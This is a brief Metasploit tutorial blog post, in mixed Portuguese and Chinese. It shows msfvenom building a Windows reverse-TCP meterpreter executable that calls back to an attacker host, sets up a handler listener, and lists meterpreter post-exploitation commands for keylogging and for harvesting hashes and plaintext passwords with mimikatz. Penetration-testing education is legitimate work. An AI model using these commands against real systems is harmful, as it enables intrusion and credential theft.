Instruções de uso MSF

insira a descrição da imagem aqui

1. O que é MSF

MSF é a abreviação de metasploit framework, que é um framework de penetração amplamente utilizado no mundo.
Existem os seguintes módulos no MSF, a saber:
exploits
auxiliares
post
payload
excoders
nops
evasion
insira a descrição da imagem aqui

Em segundo lugar, o uso de MSF

1. Inicie o serviço SQL

service postgresql start
或者:systemctl start postgresql

2. Inicialize o serviço de banco de dados

msfdb init

3. Entre na interface msf

msfconsole

4. Verifique se o serviço de banco de dados está normal

db_status

5. comandos comuns msf

use 攻击模块
show payloads
set payloads
set target
show options
set rhosts
set rports
exploit
search

3. Geração de carga útil: msfvenom

msfvenom -l payloads #查看msfvenom中所有的payload
msfvenom --list formats  #查看支持的后缀名的格式

Gerar cavalo de conexão:

msfvenom -p 指定要使用的payload lhost=回连攻击机ip地址 lport=回连攻击机的端口 -f 指定要输出的payload格式 > 输出的文件路径+文件名
---------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP地址> LPORT=<连接的端口号> -f exe >name.exe

Monitor de configuração local:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2<本机ip地址>
set lport 3344<本机指定端口>
exploit

Shell rebote com sucesso...

Em quarto lugar, o uso de meterpreter

常用命令:
backgrouond  #将meterpreter会话终端隐藏在后台
sessions   #查看已经成功获取的会话,使用sessions -l
quit      #直接关闭当前的meterpreter会话终端
shell 		#获取系统的控制台shell
ps  		#查看目标主机运行的进程信息
migrate 	#将meterpreter会话从一个进程迁移到另一个进程
execute		#可在目标机器执行文件
getpid 		#获取当前会话所在进程的pid值
kill 进程号		#杀死指定进程号
getuid      #获取运行meterpreter会话的用户名,了解当前权限
键盘记录:
keyscan_start
keyscan_dump
keyscan_stop		#键盘记录
mimikatz模块:
load mimikatz	#加载mimikatz

msc				#获取hash值

kerberos		#获取明文密码

wdigest			#获取系统账户信息

mimikatz_command -f sekurlsa::searchPassword

Acho que você gosta

Origin blog.csdn.net/dakhda/article/details/132157974
Recomendado
Clasificación